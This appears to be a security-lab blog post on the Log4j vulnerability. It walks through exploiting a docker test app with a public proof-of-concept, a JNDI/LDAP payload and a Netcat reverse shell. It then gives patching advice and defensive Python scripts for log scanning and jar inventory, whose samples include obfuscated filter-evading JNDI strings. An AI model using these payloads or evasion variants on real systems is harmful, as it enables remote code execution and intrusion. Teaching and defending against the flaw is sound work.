Log4j Vulnerability

  • Many tech stacks are vulnerable because so many tools use Log4j, including infrastructure, dev-tools, and CI/CD products.
  • It cannot be upgraded in a few days as it is the core component of many products like network devices, management consoles, and enterprise software and hardware.
  • The exploit can arrive over any protocol, including API, DNS, or UDP. At this time, WAFs are of little help.
  • Once the git clone has completed, change into the cloned directory. For that, I used the command:
  • cd /home/kali/log4j-shell-poc
  • After entering the log4j directory, run the docker build command:
  • docker build -t log4j-shell-poc .
  • After that, run the second command from the GitHub page:
  • docker run --network host log4j-shell-poc
  • These commands will enable us to use the docker file with a vulnerable app.
  • Once this command completes, check whether the web app has been built.
  • For that, browse to the machine IP including the port number, i.e. 8080:
  • <machine-ip>:8080
  • At last, we find our vulnerable website.
  • Download log4j shell from GitHub, in the same process that we had done in the lab setup (just ignore this step if you are using the same machine as a target and an attacker).
  • Now we need to install the Java JDK version on the machine.
  • This can be downloaded at the following link.
  • Now go to the download folder and unzip the JDK file by executing the following command and later move the extracted file to the /usr/bin folder.
  • After completing these steps we have to exit from the /usr/bin directory and enter into the log4j shell.
  • Let’s check the content of that directory
  • Here I found something interesting that is poc.py.
  • I have opened that file poc.py by using the command: sudo nano poc.py.
  • Here we need to modify ‘./jdk1.8.2.20/’ to ‘/usr/bin/jdk1.8.0_202/’.
  • What we have done here is we have changed the path of the java location and the java version in the script.
  • Now let’s initiate a Netcat listener.
  • In a terminal, make sure you are in the log4j-shell-poc directory when executing the command:
  • python3 poc.py --userip 0.0.0.0 --webport 8000 --lport 9001
  • This script starts the malicious LDAP server locally.
  • Now let’s copy the "send me" string that the script printed: ${jndi:ldap://192.168.29.163:1389/a}.
  • Paste it into the username field in the browser. This will be our payload.
  • In the password field, we can provide anything.
  • Click the login button to execute the payload, then go back to the Netcat window, where we should get a reverse shell.
  • Patching: Internet-facing machines, devices, and services should be patched and updated as soon as the patch/update is released.
  • Visibility: Get an overview of systems and software that may be using Log4j in your environment. Not every Java-dependent machine is vulnerable, but sometimes an old machine, IoT device, or forgotten web service may cause extreme disorder, so make sure to have at least visibility.
  • Isolation: Sometimes patching isn’t available right away. Vulnerable devices and services connected/facing the internet should be isolated from it, and mitigation measures should be applied.
  • Use web application firewalls (WAFs) to filter malicious requests.
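As an added example (not code from the original post or from the log4j-shell-poc project), the Python scanner below illustrates both the "WAFs are of little help" caveat and the WAF mitigation. Matching on the literal `${jndi:` only catches the plain form of the lookup; requests that spell the same lookup through Log4j's own `${lower:…}` or `${…:-…}` substitution syntax slip past that filter. The scanner therefore URL-decodes each line, collapses those substitutions until nothing changes, and only then looks for a JNDI lookup. The access-log lines and the 192.0.2.x addresses are constructed for the example.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post).
# 192.0.2.0/24 is a documentation range, so nothing here points at a real host.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "POST /login HTTP/1.1" 200 88 "-" "${jndi:ldap://192.0.2.10:1389/a}"
10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${lower:l}dap://192.0.2.10:1389/a}"
10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 88 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://192.0.2.10:1099/x}"
10.0.0.7 - - [10/Dec/2021:12:00:05 +0000] "GET /search?q=hello%20world HTTP/1.1" 200 512 "-" "curl/7.79"
"""

# A JNDI lookup after normalisation: ${jndi:<scheme>:...}
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:")
# ${lower:x} / ${upper:x} evaluate to x (case is irrelevant once we lowercase)
CASE_RE = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# ${name:-default} evaluates to the default when the key is empty/unknown, e.g. ${::-j} -> j
DEFAULT_RE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")


def naive_match(line: str) -> bool:
    """What a plain string filter would do: look for the literal '${jndi:' only."""
    return "${jndi:" in line.lower()


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode, then collapse Log4j substitution tricks until the text stops changing."""
    text = unquote(text)
    for _ in range(max_rounds):  # bounded so nested junk cannot loop forever
        new = CASE_RE.sub(lambda m: m.group(1), text)
        new = DEFAULT_RE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text.lower()


def scan_log(text: str) -> List[Dict]:
    """Return one finding per line that contains a JNDI lookup after normalisation."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = JNDI_RE.search(normalize(line))
        if m:
            findings.append({
                "line": lineno,
                "scheme": m.group(1),
                "evaded_naive": not naive_match(line),  # True if a literal filter would have missed it
                "raw": line,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "EVADED literal filter" if f["evaded_naive"] else "caught by literal filter"
        print(f"line {f['line']}: jndi scheme={f['scheme']} ({flag})")
```

Run against the constructed log, lines 2, 3 and 4 are reported, and only line 2 would have been caught by the literal filter; that gap is why the post's advice to patch, inventory and isolate matters more than relying on request filtering alone.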
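The "Visibility" item above asks for an inventory of where Log4j is actually deployed. The following Python script is an added example, not code from the original post, of how such an inventory can be built: it walks a directory tree, opens every `log4j-core-*.jar`, reads `Implementation-Version` from the manifest (falling back to the file name), and also reports whether the `JndiLookup` class is still present, since removing that class was one of the published interim mitigations. The version baseline of 2.17.1 is an assumption made for the example; adjust it to your own policy. The jars it scans are constructed stand-ins written to a temporary directory, not real Log4j builds.

```python
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

# Assumed baseline for this example: anything below 2.17.1 is reported. Adjust to your own policy.
BASELINE = (2, 17, 1)
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Pull a major.minor[.patch] tuple out of a manifest value or a file name."""
    m = VERSION_RE.search(text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def inspect_jar(path: str) -> Dict:
    """Read the version and JndiLookup presence from one log4j-core jar."""
    version = None
    has_jndi = False
    try:
        with zipfile.ZipFile(path) as z:
            names = set(z.namelist())
            has_jndi = JNDI_CLASS in names
            if "META-INF/MANIFEST.MF" in names:
                manifest = z.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
                for line in manifest.splitlines():
                    if line.lower().startswith("implementation-version:"):
                        version = parse_version(line.split(":", 1)[1])
    except zipfile.BadZipFile:
        pass  # not a real jar; still listed so someone looks at it
    if version is None:
        version = parse_version(os.path.basename(path))  # fall back to the file name
    return {
        "path": path,
        "version": version,
        "has_jndi_lookup": has_jndi,
        "below_baseline": version is not None and version < BASELINE,
    }


def find_log4j_core(root: str) -> List[Dict]:
    """Walk a tree and inspect every log4j-core-*.jar found in it."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            low = name.lower()
            if low.startswith("log4j-core") and low.endswith(".jar"):
                results.append(inspect_jar(os.path.join(dirpath, name)))
    return sorted(results, key=lambda r: r["path"])


def make_fake_jar(path: str, version: str, with_jndi: bool) -> None:
    """Write a constructed stand-in jar: a manifest plus an optional empty JndiLookup entry."""
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if with_jndi:
            z.writestr(JNDI_CLASS, b"")


def demo() -> List[Dict]:
    """Build a constructed directory tree in a temp dir, scan it, and return the findings."""
    root = tempfile.mkdtemp()
    for app in ("app1", "app2", "app3"):
        os.makedirs(os.path.join(root, app, "lib"))
    make_fake_jar(os.path.join(root, "app1", "lib", "log4j-core-2.14.1.jar"), "2.14.1", True)
    make_fake_jar(os.path.join(root, "app2", "lib", "log4j-core-2.14.1.jar"), "2.14.1", False)  # class removed
    make_fake_jar(os.path.join(root, "app3", "lib", "log4j-core-2.17.1.jar"), "2.17.1", True)
    return find_log4j_core(root)


if __name__ == "__main__":
    for r in demo():
        print(f"{r['path']}: version={r['version']} below_baseline={r['below_baseline']} "
              f"jndi_lookup_present={r['has_jndi_lookup']}")
```

Two caveats a practitioner should keep in mind: the scan only sees jars that sit as files on disk, so copies bundled inside a WAR, EAR or shaded "fat" jar need a second pass that opens those archives too, and the file-name fallback is only as trustworthy as whoever named the file.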

CSCC LABS

Cybersecurity Comprehensive Coverage